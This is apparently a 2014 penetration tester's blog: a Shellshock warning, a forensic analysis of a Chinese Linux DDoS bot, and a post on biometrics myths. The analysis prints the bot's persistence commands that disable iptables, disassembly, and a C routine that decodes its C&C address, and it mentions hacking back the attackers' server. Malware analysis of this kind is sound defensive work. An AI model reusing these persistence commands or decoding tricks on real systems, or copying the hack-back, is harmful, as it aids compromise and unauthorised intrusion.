What I do

I am an Information Risk Consultant and Penetration Tester. I specialize mostly in penetrating secure networks and computer systems, simulating an organized, professional attack against your organization, after which I deliver a detailed report summarizing the weaknesses found and the vectors exploited. This will help you gain control over your infrastructure's security and maximize your protection.

Saturday, November 22, 2014

NEW WAVE OF ATTACKS (this post is dedicated to Sys Admins)

I work a lot with huge banks, several government agencies, parastatals and huge PR firms that are constant targets of major blackhat organizations. Mark my words, I have seen all kinds of attacks, and the dirt these hackers leave behind.



Since the Shellshock vulnerability went public I have seen major bash attacks appear out of nowhere, with hackers launching serious operations against major infrastructures across the globe. Chinese bot herders are also very busy getting ELF binaries onto servers, especially ones running cPanel (commonly used by webmasters in Nairobi), through CGI scripts the webmasters left hanging around. The funny thing is that sys admins don't listen; now a lot of them have learned these lessons the hard way.

Now, apart from the Chinese bot herders, hacktivists and organized criminals, there is a wave of operatives literally targeting infrastructure that might hold sensitive code, sensitive documents, website backups together with their web databases, and email addresses, and then uploading the loot to compromised servers or even 0wn3d C&Cs, after getting in through the Shellshock vulnerabilities (CVE-2014-6271, CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187).

The way these attacks are running, it looks like spy organizations that are well funded, well organized and have a lot of time on their hands are ready to collect intelligence from unsuspecting infrastructures.

It is really important that admins patch their machines in time. A flaw this big, which affects every application that executes bash, from Postfix to Apache to Nginx, is critical and can cause huge business impact.

Sunday, October 26, 2014

CHINA ELFs

It's been a while since I posted; I have been crazy busy, but this coming month I will set aside some time just for blogging.

A few months ago we were testing a KE Govt office that was complaining of a high volume of attacks which they didn't understand and couldn't locate, since the system was Linux based. And as you know, GOK has little capacity as far as cyber crime and cyber warfare are concerned. So during our tests we landed on Linux.DDoS.22.

During penetration tests we get to find a lot, and I can assure you that it is not only cyber warfare in East Africa; there is a lot of cyber espionage and cyber terror happening right now.

Linux.DDoS.22 is a Chinese ELF that is used for DDoS attacks on unaware infrastructures around the world. The attackers install the ELF as pktmake, which you will find in /bin on your Linux servers, and it modifies your /etc/rc.local so that it restarts automatically, like below:

cat /etc/rc.local
#!/bin/sh -e
/root/task1 reboot
/root/server reboot
/root/guchun26 reboot


It will even stop iptables, as follows, in rc.local:

cd  /root/
./10&
/etc/init.d/iptables stop
cd  /root/
./10&
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./10
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./10
/etc/init.d/iptables stop
cd  /root/
./ma&
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./ma
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
cd  /root/
./guchun
/etc/init.d/iptables stop
/bin/cmds start



During our reverse engineering and forensics work we realized the ELF was collecting information about the infected box (hardware, processor information, amount of memory) and sending it to some Chinese crooks over an encrypted connection to a C&C.

The C&C is usually hard-coded in the source code, but the Chinese use mathematical formulas to hide the information, and it is up to the forensics engineers to recover it via reverse engineering, counter cyber intelligence and covert data acquisition.

One of the IPs can be found with common checks using lsof, as below:

pktmake    1355    root    3u  IPv4   9964      0t0  TCP REDACTED.xx.ke:36811->23.234.50.32:37368 (ESTABLISHED)

With reverse engineering we were able to find other IPs from China that were used to upload logs and update the box, but the above machine, if hacked, could yield more intel about the main C&C, and that's what we were after.

An nmap scan on the box showed us this:

Nmap scan report for 23.234.50.32
Host is up (0.32s latency).
Not shown: 65305 closed ports, 44 filtered ports
PORT      STATE SERVICE       VERSION
80/tcp    open  http-proxy    Squid http proxy 2.7.STABLE4
89/tcp    open  http          Microsoft IIS httpd
1025/tcp  open  msrpc         Microsoft Windows RPC
3306/tcp  open  mysql         MySQL (unauthorized)
5918/tcp  open  ms-wbt-server Microsoft Terminal Service
37368/tcp open  unknown


So, I am not going to go deep into how this Chinese box was exploited, but after some reverse engineering of the ELFs:

/bin/pktmake: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped

We found other ELFs that were closely associated with the main ELF.

file /bin/cmds
/bin/cmds: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.18, not stripped

file /root/guchun26
/root/guchun26: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped



And these were the source files it was compiled from:


crtstuff.c
main.cpp
DNS.cpp
AttackLogic.cpp
Iattack.cpp
info.cpp
Lock.cpp
SYN.cpp
TaskManager.cpp
TCP.cpp
TcpClient.cpp
Thread.cpp
UDP.cpp
utils.cpp
CC.cpp
rc4.c

The first step was to find the pieces of code showing how the ELF connects to the C&C, and from there how we could find all the other boxes they were using for the initial attacks.

_v2072 = ">>>>>>>>>>> in net wrok thread";
     *__esp = 135652608;
    _t31 = __ebx->basic_ostream& , 5, char * )(__edi, __esi);
    _v2072 = 134746416;
     *__esp = _t31;
    L0807EF10();
    L080DEAD0(__ebx, __edi, __esi,  &_v2052, 0, 2048);
    while(( *(_a4 + 100) & 255 ^ 1) != 0) {
        _t39 = _a4 + 560->c_str(void )();
        _v2068 = 37368;
        _v2072 = _t39;
         *__esp = _a4 + 60;
        if((_t39->Connect(char * , unsigned int )() ^ 1) == 0) {
            if((L08049C60(_a4, _a4) ^ 1) == 0) {
                while(( *(_a4 + 100) & 255 ^ 1) != 0) {
                    L080DEAD0(__ebx, __edi, __esi,  &_v2052, 0, 2048);
                    if((L0805223E( ?_? ( &_v2052), _a4 + 60,  &_v2052) ^ 1) != 0) {


That's when we started to understand the mathematical formula used by the intruder.
Alright, some segment mapping:

  Segment Sections...
   00     .note.ABI-tag .init .text __libc_freeres_fn __libc_thread_freeres_fn .fini .rodata __libc_subfreeres __libc_atexit __libc_thread_subfreeres .eh_frame .gcc_except_table
   01     .tdata .ctors .dtors .jcr .data.rel.ro .got .got.plt .data .bss __libc_freeres_ptrs
   02     .note.ABI-tag
   03     .tdata .tbss

There are a lot of Chinese-language strings in the source code:

.rodata:081301A0 aINZD  db 'エエスィヤュハシフラスモラヨハァーワ(%d)',0Dh,0Ah,0
0x00747E0  CUNG5
0x007518F  CUNG
0x0075693  B4CUNG
0x0102520  i18n:1999
 
 
A file called fake.cfg had some juicy information:


0
YOUR-IP-HERE:AND-HERE
10000:60000
 
 
getsockname(3, {sa_family=AF_INET, sin_port=htons(48417), sin_addr=inet_addr("mmd.mmd.mmd.mmd")}, [16]) = 0

They were also doing test connections to www.baidu.com, to see if it is reachable once the ELF is installed.

0x00E50FD  www.baidu.com
// PoC:
sendto(3, "\231\v\1\0\0\1\0\0\0\0\0\0\3www\5baidu\3com\0\0\1\0\1", 31, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("8.8.8.8")}, 16) = 31
recvfrom(3, "\231\v\201\200\0\1\0\2\0\0\0\0\3www\5baidu\3com\0\0\1\0\1\300"..., 1024, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("8.8.8.8")}, [16]) = 74


The DDoS functionality was actually in a file called ThreadAttack.cpp. This was interesting, because this is where we realized we might catch the main Chinese C&C server.
0x805478A ; CThreadAttack::EmptyConnectionAtk(CSubTask &)
  0x805478Apublic _ZN13CThreadAttack18EmptyConnectionAtkER8CSubTask
  0x805478A_ZN13CThreadAttack18EmptyConnectionAtkER8CSubTask proc near
  0x805478A push ebp
  0x805478B mov  ebp, esp
  0x805478D leave
  0x805478E retn
  0x805478E
  0x805478E _ZN13CThreadAttack18EmptyConnectionAtkER8CSubTask endp
 
  0x8054790 ; CThreadAttack::HttpAtk(CSubTask &)
  0x8054790public _ZN13CThreadAttack7HttpAtkER8CSubTask
  0x8054790_ZN13CThreadAttack7HttpAtkER8CSubTask proc near
  0x8054790 push ebp
  0x8054791 mov  ebp, esp
  0x8054793 leave
  0x8054794 retn
  0x8054794
  0x8054794 _ZN13CThreadAttack7HttpAtkER8CSubTask endp
 
  0x8054796 ; CThreadAttack::FakeUserAtk(CSubTask &)
  0x8054796public _ZN13CThreadAttack11FakeUserAtkER8CSubTask
  0x8054796_ZN13CThreadAttack11FakeUserAtkER8CSubTask proc near
  0x8054796 push ebp
  0x8054797 mov  ebp, esp
  0x8054799 leave
  0x805479A retn
  0x805479A
  0x805479A _ZN13CThreadAttack11FakeUserAtkER8CSubTask endp
  0x80532D2 sub  esp, 214h ; Integer Subtraction
  0x80532D8 lea  ecx, [ebp+var_10C] ; Load Effective Address
  0x80532DE mov  edx, offset _ZZN9CServerIP10InitializeEvE4C_48 ; CServerIP::Initialize(void)::C.48 <======
  0x80532E3 mov  eax, 100h
  0x80532E8 sub  esp, 4  ; Integer Subtraction
  0x80532EB push eax
  0x80532EC push edx
  0x80532ED push ecx
  0x80532EE call memcpy  ; Call Procedure
  0x80532F3 add  esp, 10h; Add
  0x80532F6 lea  ecx, [ebp+var_20C] ; Load Effective Address
  0x80532FC mov  edx, offset _ZZN9CServerIP10InitializeEvE4C_49 ; CServerIP::Initialize(void)::C.49 <======
  0x8053301 mov  eax, 100h
  0x8053306 sub  esp, 4  ; Integer Subtraction
  0x8053309 push eax
  0x805330A push edx
  0x805330B push ecx
  0x805330C call memcpy  ; Call Procedure
  0x8053311 add  esp, 10h; Add
  0x8053314 push 27h
  0x8053316 push offset a7005601212 ; "70/056/012/12"  ; <============================
  0x805331B push 0FFh
  0x8053320 lea  eax, [ebp+var_10C] ; Load Effective Address
  0x8053326 push eax
  0x8053327 call _ZN8CUtility7DeCryptEPciPKci ; CUtility::DeCrypt(char *,int,char  const*,int)
  0x805332C add  esp, 10h; Add
  0x805332F push 0Ah
  0x8053331 push offset a63551; "63551" ; <============================
  0x8053336 push 0FFh
  0x805333B lea  eax, [ebp+var_20C] ; Load Effective Address
  0x8053341 push eax
  0x8053342 call _ZN8CUtility7DeCryptEPciPKci ; CUtility::DeCrypt(char *,int,char  const

So far we had the formula; now it was all about getting down to cracking the encoded C&C information.
0x8062EF0
  0x8062EF0 ; CUtility::DeCrypt(char *, int, char  const*, int)
  0x8062EF0 public _ZN8CUtility7DeCryptEPciPKci
  0x8062EF0 _ZN8CUtility7DeCryptEPciPKci proc near  ; CODE XREF: CServerIP::Initialize(void)
  0x8062EF0 ; CServerIP::Initialize(void)
  0x8062EF0
  0x8062EF0 var_4= dword ptr -4
  0x8062EF0 arg_0= dword ptr  8
  0x8062EF0 arg_4= dword ptr  0Ch
  0x8062EF0 arg_8= dword ptr  10h
  0x8062EF0 arg_C= dword ptr  14h
  0x8062EF0
  0x8062EF0 push ebp
  0x8062EF1 mov  ebp, esp
  0x8062EF3 sub  esp, 10h; Integer Subtraction
  0x8062EF6 mov  [ebp+var_4], 0
  0x8062EFD jmp  short loc_8062F36 ; Jump
  0x8062EFD
  0x8062EFF
  0x8062EFF loc_8062EFF: ; CODE XREF: CUtility::DeCrypt(char *,int,char  const*,int)
  0x8062EFF mov  eax, [ebp+var_4]
  0x8062F02 and  eax, 1  ; Logical AND
  0x8062F05 test al, al  ; Logical Compare
  0x8062F07 jzshort loc_8062F1E ; Jump if Zero (ZF=1)
  0x8062F07
  0x8062F09 mov  eax, [ebp+var_4]
  0x8062F0C mov  edx, eax
  0x8062F0E add  edx, [ebp+arg_0] ; Add
  0x8062F11 mov  eax, [ebp+var_4]
  0x8062F14 add  eax, [ebp+arg_8] ; Add
  0x8062F17 mov  al, [eax]
  0x8062F19 inc  eax  ; Increment by 1
  0x8062F1A mov  [edx], al
  0x8062F1C jmp  short loc_8062F31 ; Jump
  0x8062F1C
  0x8062F1E
  0x8062F1E loc_8062F1E: ; CODE XREF: CUtility::DeCrypt(char *,int,char  const*,int)
  0x8062F1E mov  eax, [ebp+var_4]
  0x8062F21 mov  edx, eax
  0x8062F23 add  edx, [ebp+arg_0] ; Add
  0x8062F26 mov  eax, [ebp+var_4]
  0x8062F29 add  eax, [ebp+arg_8] ; Add
  0x8062F2C mov  al, [eax]
  0x8062F2E dec  eax  ; Decrement by 1
  0x8062F2F mov  [edx], al
  0x8062F2F
  0x8062F31
  0x8062F31 loc_8062F31: ; CODE XREF: CUtility::DeCrypt(char *,int,char  const*,int)
  0x8062F31 lea  eax, [ebp+var_4] ; Load Effective Address
  0x8062F34 inc  dword ptr [eax] ; Increment by 1
  0x8062F34
  0x8062F36
  0x8062F36 loc_8062F36: ; CODE XREF: CUtility::DeCrypt(char *,int,char  const*,int)
  0x8062F36 mov  eax, [ebp+var_4]
  0x8062F39 cmp  eax, [ebp+arg_C] ; Compare Two Operands
  0x8062F3C jge  short locret_8062F52 ; Jump if Greater or Equal (SF=OF)
  0x8062F3C
  0x8062F3E mov  eax, [ebp+var_4]
  0x8062F41 cmp  eax, [ebp+arg_4] ; Compare Two Operands
  0x8062F44 jge  short locret_8062F52 ; Jump if Greater or Equal (SF=OF)
  0x8062F44
  0x8062F46 mov  eax, [ebp+var_4]
  0x8062F49 add  eax, [ebp+arg_8] ; Add
  0x8062F4C mov  al, [eax]
  0x8062F4E test al, al  ; Logical Compare
  0x8062F50 jnz  short loc_8062EFF ; Jump if Not Zero (ZF=0)
  0x8062F50
  0x8062F52
  0x8062F52 locret_8062F52: ; CODE XREF: CUtility::DeCrypt(char *,int,char  const*,int)
  0x8062F52 ; CUtility::DeCrypt(char *,int,char  const*,int)
  0x8062F52 leave; High Level Procedure Exit
  0x8062F53 retn ; Return Near from Procedure
  0x8062F53
  0x8062F53 _ZN8CUtility7DeCryptEPciPKci endp
  0x8062F53

And this decoded the main C&C as 61.147.103.21:54460.
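As an added example (not from the original post and not the malware's own source), here is a C reimplementation of the CUtility::DeCrypt loop in the disassembly above, run over the two encoded literals that CServerIP::Initialize pushes, so a defender can reproduce the decoding of the C&C address from the sample. The parameter names, and the assumption that the C.48/C.49 template copied into the output buffer is zero-filled, are mine.

```c
#include <stdio.h>
#include <string.h>

/* Mirrors the disassembly at 0x8062EF0. var_4 is the index i; arg_0/arg_4
 * are the output buffer and its length, arg_8/arg_C the encoded input and
 * its length (parameter names are assumptions). The loop test runs before
 * each byte (the entry jmp to loc_8062F36): stop when i reaches either
 * length or the input byte is NUL. Odd indices are incremented (inc eax,
 * only al is stored), even indices decremented (dec eax). The routine never
 * writes a terminating NUL itself. */
void cutility_decrypt(char *dst, int dst_len, const char *src, int src_len)
{
    int i = 0;                                /* [ebp+var_4] = 0 */
    while (i < src_len && i < dst_len && src[i] != '\0') {
        if (i & 1)
            dst[i] = (char)(src[i] + 1);      /* loc_8062EFF: odd index  */
        else
            dst[i] = (char)(src[i] - 1);      /* loc_8062F1E: even index */
        i++;                                  /* loc_8062F31 */
    }
}

/* Reproduces the caller's setup in CServerIP::Initialize: a 0x100-byte
 * buffer filled from a template (assumed all zeros here, which also gives
 * us the NUL terminator), dst_len 0xFF, and the encoded literal with the
 * exact length pushed in the disassembly. Returns dst. */
const char *decode_config_string(char *dst, size_t dst_size,
                                 const char *encoded, int encoded_len)
{
    memset(dst, 0, dst_size);                 /* stands in for memcpy of C.48/C.49 */
    cutility_decrypt(dst, 0xFF, encoded, encoded_len);
    return dst;
}

int main(void)
{
    char ip[0x100], port[0x100];
    /* Encoded literals and lengths as pushed at 0x8053314 and 0x805332F. */
    decode_config_string(ip, sizeof ip, "70/056/012/12", 0x27);
    decode_config_string(port, sizeof port, "63551", 0x0A);
    printf("C&C: %s:%s\n", ip, port);        /* prints 61.147.103.21:54460 */
    return 0;
}
```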

This C&C server also hosted the binaries used to update the small operational botnets, served through the HFS app.


One of the machines we caught, which was used to manipulate the L.A. Chinese bot server, was 220.191.230.250.
Now do some research on that, and tell me if you know who those are.


Wednesday, July 02, 2014

MYTHS ON BIOMETRICS

Myth: Iris recognition devices use lasers to scan your eyes.

Reality: Iris recognition cameras take a black and white picture and use non-invasive near-infrared illumination that is barely visible and very safe.

Myth: "Stolen" body parts can be used to fool the system.

Reality: Quality biometric recording and detection systems can determine "liveness" in order to prevent this type of fraud.

Myth: Identical twins can fool the system.

Reality: If the system is poorly configured, then this is possible, though it can be eradicated during White Box Penetration Testing. Good systems will highlight a false match, which will require human intervention to complete the identification process.

Myth: Biometrics will get rid of the evil in our world.

Reality: Identity Management systems cannot perform miracles.


Continue doing real Penetration Testing, and let's secure facilities for real.